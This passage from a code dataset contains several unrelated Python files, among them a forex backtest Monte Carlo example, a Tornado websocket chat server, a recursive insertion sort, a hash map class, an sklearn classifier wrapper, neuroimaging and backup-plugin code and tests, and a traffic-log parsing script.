\n - PORTFOLIO : This object corresponds to the portfolio to be \n simulated. \n - PRICE/PRICE_TABLE : These objects refers to the datasets. \n - SIMULATION : This object corresponds to the simulation algorithm \n itself.\n\"\"\"\n# Usual modules importations \nimport sys, os \nimport numpy as np \nimport pandas as pd \nimport datetime as dt \nimport matplotlib.pyplot as plt \nimport pprint\nimport copy \nfrom multiprocessing import Pool\n\n# Q26 BacktestSystem class importations \nfrom quanTest.symbol import SYMBOL\nfrom quanTest.portfolio import PORTFOLIO \nfrom quanTest.data import PRICE \nfrom quanTest.data import PRICE_TABLE\nfrom quanTest.simulation import SIMULATION\n\n\n\"\"\" \n===============================================================================\nINITIALIZATION STEP : DATA PRICE PREPARATION\n===============================================================================\n\"\"\"\n\n# We define the path to the dataset\npath = \"./\"\npath += \"exampleDataFile.csv\"\n# We create an object PRICE and give it a name \nprice = PRICE(\"EUR.USD\") \n# We associate the name of the columns in the datafile with \n# the properties of the PRICE object.\n# In the specific case of the exampleDataFile.csv dataset, we do not have \n# any information of ask/bid price, so we consider by default that ask = bid \n# in the reading process. This will lead to a spread = 0.\nprice.setColumnsTitle(askOpen =\"open\", \n askHigh =\"high\",\n askLow =\"low\",\n askClose =\"close\", \n bidOpen =\"open\", \n bidHigh =\"high\",\n bidLow =\"low\",\n bidClose =\"close\",\n dateFormat =\"%Y.%m.%d %H:%M\", \n volume =\"vol\",\n splitDaysHours =True, \n days =\"date\", \n hours =\"hour\")\n# We read the data\nprice.read(path)\n# We define the timeframe associated to the loaded data \nprice.setBaseTimeframe(timeframe = dt.timedelta(minutes = 1))\n# We fill the missing data according to a data filling model \nprice.fillMissingData()\n\n\n# If necessary, we can shift our data \nprice.shiftMarketTime(timeshift = 0)\n# We can define the time zone in which data have been scraped (UTC+...)\nprice.dataTimeZone = 0\n# We can define the timezone in which the market is located (UTC+...)\nprice.marketTimeZone = 0\n# We can define market opening/closing hours in the format \"HH:MM\"\n# Note : If the market never close, the opening hour is \"00:00\"\n# while the closing hour is \"24:00\".\nprice.marketOpeningHour = \"00:00\"\nprice.marketClosingHour = \"24:00\"\n# If the market has a mid day break or others breaks during the day \n# write it in the format : \"HH:MM-HH:MM\"\nprice.marketLunch = None\nmarketBreakList = list()\n# Days of the week the market is open - 0 : Monday -> 6 : Sunday \nprice.daysOfWeek = [0, 1, 2, 3, 4]\n# Soon ... vacations \n# Function that define if the market is open/close \nprice.setMarketState() \n\n# From the price object, it is possible to define another exact same object \n# thanks to the deepcopy function\nprice_H1 = copy.deepcopy(price)\n# Here this dataset object is resampled to be used in the simulation. \n# The resampling process is exactly the same as you can see \n# on trading platforms. \nprice_H1.resampleData(\"01:00\", name = \"EUR.USD\")\n\n# We generate our data table which will be involved in the simulation \ntable = PRICE_TABLE([price, price_H1]) \n# In the case where we have more than 1 not resampled price, \n# the synchronize function will be necessary. 
\ntable.synchronize()\n\n\"\"\" \n===============================================================================\nINITIALIZATION STEP : SYMBOL PROPERTIES IN THE BROKER FRAME\n===============================================================================\nNote : Fees are not yet implemented \n\"\"\"\n\nsymbol = SYMBOL(symbolName = \"EUR.USD\",\n contractSize = 100000, \n marginCurrency = \"USD\", # Can be any existing currency (only USD is working for instance)\n profitCalculationMethod = \"Forex\", # \"CFD\", \"Forex\", \"Stock\", \"CFD-Index\"\n marginRequestMethod = \"Forex\", # \"CFD\", \"Forex\", \"Stock\", \"CFD-Index\"\n marginPercentage = 100, \n execution = \"Market\", \n minimalVolume = 0.01, \n maximalVolume = 100.0, \n volumeStep = 0.01, \n precision = 5, # Price precision (3 means 1 point = 0.001)\n exchangeType = \"Point\", # \"Point\", \"Percentage\"\n exchangeLong = 6.88, \n exchangeShort = 0.63)\n\n\"\"\" \n===============================================================================\nINITIALIZATION STEP : PORTFOLIO PROPERTIES\n===============================================================================\n\"\"\"\n\n# We initialize our portfolio \np = PORTFOLIO(initialDeposit = 100000, # The initial client deposit \n leverage = 30, # The leverage value (margin = initialDeposit*leverage)\n currency = \"USD\", # The currency \n positions = \"long & short\", # \"long\", \"short\" or \"long & short\"\n marginCallTreeshold = 100, # If marginLevel < marginCallTreeshold : Warning (no more trading allowed)\n marginMinimum = 50, # If marginLevel < marginMinimum : Automatically close all losing positions \n minimumBalance = 50000, # If balance < minimumBalance : No more trading allowed \n maximumProfit = 100000, # If balance - inialDeposit > maximumProfit : No more trading allowed \n maximumDrawDown = 70, # If drawDown < maximumDrawDown : No more trading allowed \n maximumConsecutiveLoss = 50000, # If valueLossSerie > maximumConsecutiveLoss : No more trading allowed \n maximumConsecutiveGain = 50000, # If valueGainSerie > maximumConsecutiveGain : No more trading allowed \n maximumNumberOfConsecutiveGains = 30)\n\n# We add the symbol identity we created inside the portfolio object \np.addSymbol(symbol)\n\n\"\"\" \n===============================================================================\nSIMULATION PREPARATION STEP\n===============================================================================\nNote that in this step, we prepare the same number of strategies and initial \nportfolio. A strategy and a portfolio interacting together have the same index \nin the list. 
\"\"\"\nN = 10 # Number of strategies\n\nstratPath = \"./\"\nstratFile = \"strategyExample\"\n\nstratPathList = list()\nstratFileList = list()\nportfolioList = list()\n\n\nfor i in range(N):\n    stratPathList.append(stratPath)\n    stratFileList.append(stratFile)\n    portfolioList.append(copy.deepcopy(p))\n\n\n# We initialize the simulation object\nsim = SIMULATION(portfolioList, table)\n\nsim.subLoopModel = \"close only\"\nsim.maxHstDataSize = 2000\nsim.startIndex = 2000\n# sim.stopIndex = 5000\nsim.logEvery = 1000\n\n\n# Relative or absolute path to the strategy file\n# and strategy class importation\nsim.strategyPath = stratPathList\nsim.strategyFile = stratFileList\nsim.importStrategy()\n\n\"\"\"\n===============================================================================\nMONTE CARLO STEP\n===============================================================================\nIn this step, we draw each moving average period from a random uniform\ndistribution.\n\"\"\"\nnp.random.seed(1)\nfor i in range(N):\n    sim.strategy[i].SMA1_period = int(np.random.uniform(5, 15))\n    sim.strategy[i].SMA2_period = int(np.random.uniform(15, 30))\n    sim.strategy[i].showInfo = False\n\n\n\"\"\"\n===============================================================================\nSIMULATION STEP\n===============================================================================\n\"\"\"\n\n# Check of the simulation parameters (not yet working)\nsim.parametersCheck()\n\n\n\"\"\"\n===============================================================================\nSIMULATION RUN IN PARALLEL MODE\n!!! Do not run this in an IDE, only through a terminal !!!\n===============================================================================\nThe \"unique\" mode means that only the strategy-portfolio couple selected by\nthe given index is executed. 
\"\"\"\n\n# For each worker we run only the single simulation selected by the index\n# of the strategy-portfolio couple, and we return the portfolio object\ndef simulate(index):\n    sim.run(mode = \"unique\", idx = index)\n    return sim.portfolio[index]\n\n\ndef main():\n    p = Pool(processes=8)\n    tasks = [(i) for i in range(N)]\n    simulations = p.map_async(simulate, tasks)\n\n    p.close()\n    p.join()\n\n    # All the modified portfolios are merged\n    # together and the list of portfolios is updated\n    # in the SIMULATION object\n    portfolioList = list()\n    for i in range(len(simulations._value)):\n        portfolioList.append(simulations._value[i])\n\n    sim.portfolio = portfolioList\n\n\nif __name__ == \"__main__\":\n    main()\n    fig, ax = sim.showEquityCurve(index = list(np.linspace(0, N-1, num = N-1, dtype = int)), xTime = True)\n\n\"\"\"\n===============================================================================\nSIMULATION RUN IN SEQUENTIAL MODE\n===============================================================================\nSequential mode means that each strategy-portfolio couple is executed before\ngoing to the next time step.\n\"\"\"\n\n# # Run of the simulation\n# sim.run(mode = \"sequential\")\n# # We plot the equity curve\n# fig, ax = sim.showEquityCurve(index = list(np.linspace(0, N-1, num = N-1, dtype = int)), xTime = True)\n","sub_path":"examples/simulationExample_MonteCarlo.py","file_name":"simulationExample_MonteCarlo.py","file_ext":"py","file_size_in_byte":11113,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"415092578","text":"import imp\nimport os\nimport sys\n\nmodule_name = 'haloevents'\nhere_dir = os.path.dirname(os.path.abspath(__file__))\nmodule_path = os.path.join(here_dir, '../../')\nsys.path.append(module_path)\nfp, pathname, description = imp.find_module(module_name)\nhaloevents = imp.load_module(module_name, fp, pathname, description)\n\n\nclass TestUnitHaloEvents:\n    def test_unit_haloevents_instantiate(self):\n        assert haloevents.HaloEvents(\"\", \"\")\n","sub_path":"tests/unit/test_unit_haloevents.py","file_name":"test_unit_haloevents.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"194100515","text":"import json\nimport os\n\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.web\nimport tornado.websocket\nfrom tornado.options import define, options\nfrom tornado.web import url\n\ndefine('port', default=8888, help='run on the given port', type=int)\n\n\nclass IndexHandler(tornado.web.RequestHandler):\n    def get(self):\n        self.render('index.html')\n\n\nclass ChatHandler(tornado.websocket.WebSocketHandler):\n    waiters = set()\n    messages = []\n\n    def open(self, *args, **kwargs):\n        self.waiters.add(self)\n        self.write_message({'messages': self.messages})\n\n    def on_message(self, message):\n        message = json.loads(message)\n        self.messages.append(message)\n        for waiter in self.waiters:\n            if waiter == self:\n                continue\n            waiter.write_message({'message': message['message']})\n\n    def on_close(self):\n        self.waiters.remove(self)\n\n\nclass Application(tornado.web.Application):\n    def __init__(self):\n        handlers = [\n            url(r'/', IndexHandler, name='index'),\n            url(r'/chat', ChatHandler, name='chat'),\n        ]\n        settings = dict(\n            template_path=os.path.join(os.path.dirname(__file__), 'templates'),\n            static_path=os.path.join(os.path.dirname(__file__), 'static'),\n            debug=True,\n        )\n        
tornado.web.Application.__init__(self, handlers, **settings)\n\n\nif __name__ == '__main__':\n app = Application()\n http_server = tornado.httpserver.HTTPServer(app)\n http_server.listen(options.port)\n tornado.ioloop.IOLoop.instance().start()\n","sub_path":"chat/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1585,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"367514602","text":"import sys\r\n\r\ndef insertion_sort(a,n):\r\n\t# Base case: if array size is 1, then return\r\n\tif n==1:\r\n\t\treturn\r\n\t# recursively sort all except the last element\r\n\tinsertion_sort(a,n-1)\r\n\t# insert the last element in its correct position in the sorted array\r\n\tlast=a[n-1]\r\n\ti=n-2\r\n\twhile i>=0 and a[i]>last:\r\n\t\ta[i+1]=a[i]\r\n\t\ti-=1\r\n\ta[i+1]=last\r\n\r\n\r\na=[int(i) for i in input().split()]\r\ninsertion_sort(a,len(a))\r\nprint(\"Sorted Array: \")\r\nfor i in a:\r\n sys.stdout.write(\"{} \".format(i))\r\n \r\n","sub_path":"insertion_sort_recursive.py","file_name":"insertion_sort_recursive.py","file_ext":"py","file_size_in_byte":498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"594330093","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom pygsp import graphs, filters, plotting, utils\nfrom pygsp.graphs import Graph\nimport networkx as nx\nimport dgl\nimport random\n\n\ndef sample_n_points(points, n_points=1024):\n candidate_ids = [i for i in range(points.shape[0])]\n sel = []\n for _ in range(n_points):\n # select idx for closest point and add to id_selections\n idx = random.randint(0,len(candidate_ids)-1)\n sel.append(candidate_ids[idx])\n # remove that idx from point_idx_options\n del candidate_ids[idx]\n return points[sel]\n\ndef plot_points_with_arrow(x, y):\n p_cloud = x\n c_cloud = np.full((len(p_cloud),3),[1, 0.7, 0.75]) # fixed color\n\n p0, nx = y[:3], y[3:]\n nz = np.cross(nx,[0,1,0])\n ny = np.cross(nz,nx)\n\n from plt_viewer import show_points\n show_points(p_cloud,c_cloud,p0=p0,nx=nx,ny=ny,nz=nz)\n\ndef plot_graph(G):\n from pygsp import plotting\n plotting.plot(G,show_edges=True,vertex_size=50)\n plt.show()\n\nif __name__ == '__main__':\n X = np.load(\"../data/val_X.npy\",allow_pickle=True)\n print(\"{} point clouds, cloud 0 has shape {}\".format(X.shape,X[0].shape))\n Y = np.load(\"../data/val_Y.npy\",allow_pickle=True)\n print(\"{} point+normals, p0=Y[0,:3], pn=Y[0,3:]\".format(Y.shape))\n\n idx = 1\n x = sample_n_points(X[idx],n_points=256)\n #plot_points_with_arrow(x, Y[idx])\n\n G = graphs.NNGraph(x,use_flann=True, center=True, k=8)\n plot_graph(G)\n\n g_dgl = dgl.DGLGraph(G)\n\n fig, ax = plt.subplots()\n nx.draw(g_dgl.to_networkx(), ax=ax)\n ax.set_title('Class: {:d}'.format(0))\n plt.show()\n","sub_path":"code/src/visualization/show_graph.py","file_name":"show_graph.py","file_ext":"py","file_size_in_byte":1610,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"567727996","text":"from sklearn.feature_extraction import DictVectorizer\nfrom seldon.pipeline.pandas_pipelines import BasePandasEstimator \nfrom collections import OrderedDict\nimport io\nfrom sklearn.utils import check_X_y\nfrom sklearn.utils import check_array\nfrom sklearn.base import BaseEstimator,ClassifierMixin\nimport pandas as pd\n\nclass SKLearnClassifier(BasePandasEstimator,BaseEstimator,ClassifierMixin):\n\n \"\"\"\n Wrapper for XGBoost classifier with 
pandas support\n XGBoost specific arguments follow https://github.com/dmlc/xgboost/blob/master/python-package/xgboost/sklearn.py\n\n clf : sklearn estimator\n sklearn estimator to run\n target : str\n Target column\n target_readable : str\n More descriptive version of target variable\n included : list str, optional\n columns to include\n excluded : list str, optional\n columns to exclude\n id_map : dict (int,str), optional\n map of class ids to high level names\n sk_args : str, optional\n extra args for sklearn classifier\n \"\"\"\n def __init__(self, clf=None,target=None, target_readable=None,included=None,excluded=None,id_map={},vectorizer=None,**sk_args):\n super(SKLearnClassifier, self).__init__(target,target_readable,included,excluded,id_map)\n self.vectorizer = vectorizer\n self.clf = clf\n self.sk_args = sk_args\n\n def fit(self,X,y=None):\n \"\"\"\n Fit an sklearn classifier to data\n\n Parameters\n ----------\n\n X : pandas dataframe or array-like\n training samples\n y : array like, required for array-like X and not used presently for pandas dataframe\n class labels\n\n Returns\n -------\n self: object\n\n \"\"\"\n if isinstance(X,pd.DataFrame):\n df = X\n (X,y,self.vectorizer) = self.convert_numpy(df)\n else:\n check_X_y(X,y)\n\n self.clf.fit(X,y)\n return self\n\n def predict_proba(self,X):\n \"\"\"\n Returns class probability estimates for the given test data.\n\n X : pandas dataframe or array-like\n Test samples \n \n Returns\n -------\n proba : array-like, shape = (n_samples, n_outputs)\n Class probability estimates.\n \n \"\"\"\n if isinstance(X,pd.DataFrame):\n df = X\n (X,_,_) = self.convert_numpy(df)\n else:\n check_array(X)\n\n return self.clf.predict_proba(X)\n\n\n def predict(self,X):\n \"\"\"\n Returns class predictions\n\n X : pandas dataframe or array-like\n Test samples \n \n Returns\n -------\n proba : array-like, shape = (n_samples, n_outputs)\n Class predictions\n \n \"\"\"\n if isinstance(X,pd.DataFrame):\n df = X\n (X,_,_) = self.convert_numpy(df)\n else:\n check_array(X)\n\n return self.clf.predict(X)\n","sub_path":"python/seldon/sklearn_estimator.py","file_name":"sklearn_estimator.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"588895834","text":"# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-\n# vi: set ft=python sts=4 ts=4 sw=4 et:\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the openfmri package for the\n# copyright and license terms.\n#\n### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Align two subject template image to each other\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n# magic line for manpage summary\n# man: -*- % cache all files required to generate the portal\n\nimport argparse\nimport os\nimport logging\n\nfrom os.path import join as opj\n\nfrom openfmri import cfg\nfrom . 
import helpers as hlp\n\nlgr = logging.getLogger(__name__)\nparser_args = dict(formatter_class=argparse.RawDescriptionHelpFormatter)\n\n\ndef setup_parser(parser):\n hlp.parser_add_common_args(parser,\n opt=('datadir', 'dataset', 'subjects', 'workdir'))\n hlp.parser_add_common_args(parser, opt=('label',))\n parser.add_argument('--ref-template',\n help=\"\"\"Reference template label\"\"\")\n parser.add_argument('--in-template',\n help=\"\"\"Input template label\"\"\")\n\nimport sys\nimport os # system functions\nimport nipype.interfaces.io as nio # Data i/o\t\t\nimport nipype.pipeline.engine as pe # pypeline engine\nimport nipype.interfaces.fsl as fsl\n\ndef align_template(wf, label, subj, intmpl, reftmpl, tmpldir):\n in_img = opj(tmpldir, intmpl, 'head.nii.gz')\n in_mask = opj(tmpldir, intmpl, 'brain_mask.nii.gz')\n ref_img = opj(tmpldir, reftmpl, 'head.nii.gz')\n ref_mask = opj(tmpldir, reftmpl, 'brain_mask.nii.gz')\n sink = pe.Node(\n interface=nio.DataSink(\n parameterization=False,\n base_directory=tmpldir,\n regexp_substitutions=[\n ('/[^/]*\\.nii', '.nii'),\n ('/[^/]*\\.mat', '.mat'),\n ]),\n name=\"sub%.3i_sink\" % (subj,),\n overwrite=True)\n\n # alignment to template\n align = pe.Node(\n name='sub%.3i_align' % (subj,),\n interface=fsl.FLIRT(\n #cost='corratio',\n cost='mutualinfo',\n reference=ref_img,\n dof=6,\n interp='sinc'))\n align.inputs.in_file = in_img\n wf.connect(align, 'out_file',\n sink, '%s.in_%s.head.@out' % (intmpl, reftmpl))\n wf.connect(align, 'out_matrix_file',\n sink, '%s.in_%s.xfm_6dof.@out' % (intmpl, reftmpl))\n # project mask\n mask2ref = pe.Node(name='sub%.3i_mask2ref' % (subj,),\n interface=fsl.ApplyXfm(\n interp='nearestneighbour',\n reference=ref_img,\n apply_xfm=True))\n mask2ref.inputs.in_file = in_mask\n wf.connect(align, 'out_matrix_file', mask2ref, 'in_matrix_file')\n wf.connect(mask2ref, 'out_file',\n sink, '%s.in_%s.brain_mask.@out' % (intmpl, reftmpl))\n # invert XFM\n invert_xfm = pe.Node(\n name='sub%.3i_invert_xfm' % (subj,),\n interface=fsl.ConvertXFM(invert_xfm=True))\n wf.connect(align, 'out_matrix_file', invert_xfm, 'in_file')\n wf.connect(invert_xfm, 'out_file',\n sink, '%s.in_%s.xfm_6dof.@out' % (reftmpl, intmpl))\n # ref2tmpl\n ref2tmpl = pe.Node(name='sub%.3i_ref2tmpl' % (subj,),\n interface=fsl.ApplyXfm(\n interp='sinc',\n reference=in_img,\n apply_xfm=True))\n ref2tmpl.inputs.in_file = ref_img\n wf.connect(invert_xfm, 'out_file', ref2tmpl, 'in_matrix_file')\n wf.connect(ref2tmpl, 'out_file',\n sink, '%s.in_%s.head.@out' % (reftmpl, intmpl))\n # rev project mask\n refmask2tmpl = pe.Node(name='sub%.3i_refmask2tmpl' % (subj,),\n interface=fsl.ApplyXfm(\n interp='nearestneighbour',\n reference=in_img,\n apply_xfm=True))\n refmask2tmpl.inputs.in_file = ref_mask\n wf.connect(invert_xfm, 'out_file', refmask2tmpl, 'in_matrix_file')\n wf.connect(refmask2tmpl, 'out_file',\n sink, '%s.in_%s.brain_mask.@out' % (reftmpl, intmpl))\n return wf\n\n\n\ndef run(args):\n # label of the group template -- used to look up config options\n label = args.label\n cfg_section = 'alignsubjtmpl2subjtmpl %s' % label\n\n dataset = hlp.get_cfg_option('common', 'dataset', cli_input=args.dataset)\n\n subjects = hlp.get_dataset_subj_ids(args)\n subjects = hlp.exclude_subjects(subjects, cfg_section)\n\n dsdir = hlp.get_dataset_dir(args)\n\n wf_name = \"alignsubjtmpl2subjtmpl_%s_%s\" % (label, dataset)\n wf = hlp.get_base_workflow(wf_name.replace('.', '_'), args)\n\n ref_tmpl = hlp.get_cfg_option(cfg_section, 'reference template',\n cli_input=args.ref_template)\n 
in_tmpl = hlp.get_cfg_option(cfg_section, 'input template',\n cli_input=args.in_template)\n\n for subj in subjects:\n subj_tmpldir = os.path.abspath(opj(dsdir, 'sub%.3i' % subj,\n 'templates'))\n wf = align_template(wf, label, subj, in_tmpl,\n ref_tmpl, subj_tmpldir)\n return wf\n\n","sub_path":"openfmri/cmdline/cmd_alignsubjtmpl2subjtmpl.py","file_name":"cmd_alignsubjtmpl2subjtmpl.py","file_ext":"py","file_size_in_byte":5186,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"307852446","text":"from typing import Any\n\n# Typically set to power or two or prime number\n_ARRAY_SIZE = 97\n\n\nclass Node:\n\n def __init__(self, key: Any, val: Any, next_node):\n self.key = key\n self.val = val\n self.next = next_node\n\n\nclass HashMap:\n \"\"\"A hash map implemented with chaining.\n\n Cf. open addressing (used by Python). Open addressing is more\n memory efficient, but could end up having to readdress\n everything if the array requires resizing, since the\n hash algorithm requires the addresses to be of fixed size.\n Therefore, even though we may have \"wasted space\", this\n behaves more gracefully as the array fills up.\n\n Operations:\n * Put(key, val): O(1) avg, O(n) worst case (collisions)\n * Get(key): O(1) avg, O(n) worst case\n * Remove(key): O(1) avg, O(n) worst case\n * Contains(key): O(1) avg, O(n) worst case\n \"\"\"\n def __init__(self, size: int = _ARRAY_SIZE):\n \"\"\"Initialize the array with a default size.\"\"\"\n self._arr = [None] * size\n self.size = 0\n\n def put(self, key: Any, val: Any):\n \"\"\"Adds a key and value to the hash map.\n\n 1. Get the hash (index)\n 2. Get the node at that index\n 3. While it's not null...\n 3.1 If the key matches, just update the value (key already exists)\n 4. Set the node at this index to be key, val, and the node at this index if it exists\n (i.e., add it to the front of the linked list)\n\n Time: O(1) average, O(n) worst case\n \"\"\"\n index = self._hash(key)\n node = self._arr[index]\n\n while node:\n if node.key == key:\n # Updating an existing key\n node.val = val\n return\n node = node.next\n\n self.size += 1\n self._arr[index] = Node(key, val, self._arr[index])\n\n def contains(self, key: Any) -> bool:\n \"\"\"Returns True if key exists in map\"\"\"\n index = self._hash(key)\n node = self._arr[index]\n\n while node:\n if node.key == key:\n return True\n node = node.next\n\n return False\n\n def get(self, key: Any) -> Any:\n \"\"\"Returns the value for this key.\"\"\"\n index = self._hash(key)\n node = self._arr[index]\n\n while node:\n if node.key == key:\n return node.val\n node = node.next\n\n raise KeyError('Key not found!')\n\n def delete(self, key: Any) -> None:\n \"\"\"Deletes a key from the hash map in a recursive fashion.\n\n 1. Get the node at this index.\n 2. 
Call the delete function with this node and key.\n 2.1 If the node is null, raise a KeyError.\n 2.2 If the node.key == key, return next node.\n 2.3 Set node.next to a call with node.next\n 2.4 Return the node.\n\n Time: O(1) average, O(n) worst case.\n \"\"\"\n index = self._hash(key)\n self._arr[index] = self._delete(self._arr[index], key)\n\n def _delete(self, node: Node, key: Any) -> Node:\n \"\"\"Delete helper method.\"\"\"\n if not node:\n raise KeyError('Key not found!')\n\n if key == node.key:\n self.size -= 1\n return node.next\n\n node.next = self._delete(node.next, key)\n return node\n\n def _hash(self, key: Any) -> int:\n \"\"\"Gets a hash index to add the item to in the array.\n\n * Take the abs value of the key's hash, then the modulus\n of the array size.\n\n :param key: The key to add to the hash map.\n :return: The position in the array to add the item.\n \"\"\"\n return abs(hash(key)) % len(self._arr)\n","sub_path":"DSA/data_structures/hash_map.py","file_name":"hash_map.py","file_ext":"py","file_size_in_byte":3674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"422874996","text":"# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\nimport collections\nfrom karbor.common import constants\nfrom karbor.context import RequestContext\nfrom karbor.resource import Resource\nfrom karbor.services.protection.bank_plugin import Bank\nfrom karbor.services.protection.bank_plugin import BankPlugin\nfrom karbor.services.protection.bank_plugin import BankSection\nfrom karbor.services.protection.client_factory import ClientFactory\nfrom karbor.services.protection.protection_plugins. 
\\\n image.image_protection_plugin import GlanceProtectionPlugin\nfrom karbor.services.protection.protection_plugins.image \\\n import image_plugin_schemas\nfrom karbor.tests import base\nimport mock\nfrom oslo_config import cfg\n\n\nclass FakeBankPlugin(BankPlugin):\n def create_object(self, key, value):\n return\n\n def update_object(self, key, value):\n return\n\n def get_object(self, key):\n return\n\n def list_objects(self, prefix=None, limit=None, marker=None):\n return\n\n def delete_object(self, key):\n return\n\n def get_owner_id(self):\n return\n\n\nfake_bank = Bank(FakeBankPlugin())\nfake_bank_section = BankSection(bank=fake_bank, prefix=\"fake\")\n\nResourceNode = collections.namedtuple(\n \"ResourceNode\",\n [\"value\",\n \"child_nodes\"]\n)\n\n\nImage = collections.namedtuple(\n \"Image\",\n [\"disk_format\",\n \"container_format\",\n \"status\"]\n)\n\n\nclass CheckpointCollection(object):\n def __init__(self):\n self.bank_section = fake_bank_section\n\n def get_resource_bank_section(self, resource_id):\n return self.bank_section\n\n\nclass GlanceProtectionPluginTest(base.TestCase):\n def setUp(self):\n super(GlanceProtectionPluginTest, self).setUp()\n self.plugin = GlanceProtectionPlugin()\n cfg.CONF.set_default('glance_endpoint',\n 'http://127.0.0.1:9292',\n 'glance_client')\n\n self.cntxt = RequestContext(user_id='admin',\n project_id='abcd',\n auth_token='efgh')\n self.glance_client = ClientFactory.create_client(\"glance\", self.cntxt)\n self.checkpoint = CheckpointCollection()\n\n def test_get_options_schema(self):\n options_schema = self.plugin.get_options_schema(\n constants.IMAGE_RESOURCE_TYPE)\n self.assertEqual(options_schema, image_plugin_schemas.OPTIONS_SCHEMA)\n\n def test_get_restore_schema(self):\n options_schema = self.plugin.get_restore_schema(\n constants.IMAGE_RESOURCE_TYPE)\n self.assertEqual(options_schema, image_plugin_schemas.RESTORE_SCHEMA)\n\n def test_get_saved_info_schema(self):\n options_schema = self.plugin.get_saved_info_schema(\n constants.IMAGE_RESOURCE_TYPE)\n self.assertEqual(options_schema,\n image_plugin_schemas.SAVED_INFO_SCHEMA)\n\n def test_create_backup(self):\n resource = Resource(id=\"123\",\n type=constants.IMAGE_RESOURCE_TYPE,\n name='fake')\n resource_node = ResourceNode(value=resource,\n child_nodes=[])\n\n fake_bank_section.create_object = mock.MagicMock()\n\n self.plugin._glance_client = mock.MagicMock()\n self.plugin._glance_client.return_value = self.glance_client\n\n self.glance_client.images.get = mock.MagicMock()\n self.glance_client.images.return_value = Image(\n disk_format=\"\",\n container_format=\"\",\n status=\"active\"\n )\n\n fake_bank_section.update_object = mock.MagicMock()\n\n self.glance_client.images.data = mock.MagicMock()\n self.glance_client.images.data.return_value = \"image-data\"\n\n self.plugin.create_backup(self.cntxt, self.checkpoint,\n node=resource_node)\n\n def test_delete_backup(self):\n resource = Resource(id=\"123\",\n type=constants.IMAGE_RESOURCE_TYPE,\n name='fake')\n resource_node = ResourceNode(value=resource,\n child_nodes=[])\n\n fake_bank_section.list_objects = mock.MagicMock()\n fake_bank_section.list_objects.return_value = [\"data_1\", \"data_2\"]\n fake_bank_section.delete_object = mock.MagicMock()\n self.plugin.delete_backup(self.cntxt, self.checkpoint,\n node=resource_node)\n\n def test_get_supported_resources_types(self):\n types = self.plugin.get_supported_resources_types()\n self.assertEqual(types,\n 
[constants.IMAGE_RESOURCE_TYPE])\n","sub_path":"karbor/tests/unit/protection/test_glance_protection_plugin.py","file_name":"test_glance_protection_plugin.py","file_ext":"py","file_size_in_byte":5188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"96"} +{"seq_id":"566095106","text":"import time\nfrom os import walk\nfrom time import gmtime, strftime\nfrom datetime import date, datetime\n\n\ncount = 0\n\ndef makeCVS(data): \n import csv\n global count \n Header = [[\"Traffic_Type\",\"Message Size (bytes)\",\"Measure Rate (msps)\",\"Time between messages\",\"Msg1\",\"Msg2\",\"Design rate\",\"Design size\"]]\n print(\"data\",data)\n with open('Result.csv', 'a') as csv_file:\n writer = csv.writer(csv_file)\n ##for key, value in data.items():\n print(\"A\")\n if count == 0:\n print(\"B\")\n writer.writerows(Header)\n count = count + 1\n \n print(\"data\", data)\n writer.writerows(data)\n #writer.writerow([key, value])\n print(\"Completed It\")\n\n\nf = [ ]\n\nfor (dirpath, dirnames, filenames) in walk(\"./Get_the_Traffic_Size_Folder\"):\n f.extend(filenames)\n break\ninputFilePointer = []\nfor (dirpath, dirnames, filenames) in walk(\"./Input\"):\n #print(filenames)\n print(\"AA\")\n \n inputFilePointer.extend(filenames)\n #print(filenames)\n\n break\nA= []\nfor i in inputFilePointer:\n if \"send\" in i:\n A.append(i)\n\n \n\ndef getAvgofTrafficMessagePeriod(f):\n\n RecMList, SendMList, = [], []\n designRate = []\n table = [] \n d,b,c =0,0,0\n for i in range( len(f)):\n temp_File = open(\"./Get_the_Traffic_Size_Folder\"+\"/\"+f[i],\"r\")\n input_File = open(\"./Input\"+\"/\"+A[i],\"r\") # Comment out here to \n \n dummy = input_File.readline() \n\n for i in dummy.split():\n if \"[\" in i:\n c=i[1:]\n print(c)\n elif \"]\" in i:\n b = i[:-1]\n print(b)\n #d=b/c\n #exit(0) # To here and run the code and see what happens \n \n \n \n RecMList=[datetime.strptime(line[:15], '%H:%M:%S.%f').strftime('%H:%M:%S.%f') for line in temp_File for word in line.split() if \"RECV\" in word ]\n temp_File.seek(0)\n SendMList = [datetime.strptime(word[5:], '%H:%M:%S.%f').strftime('%H:%M:%S.%f') for line in temp_File for word in line.split() if \"sent>\" in word]\n temp_File.seek(0)\n\n # import numpy as np\n # x = datetime.strptime(\"00:00:00.000000\", '%H:%M:%S.%f') \n # sumOfRecList = abs(RecMList[0]- RecMList[len(RecMList)-1]) # Taking the Average of time \n # for i in 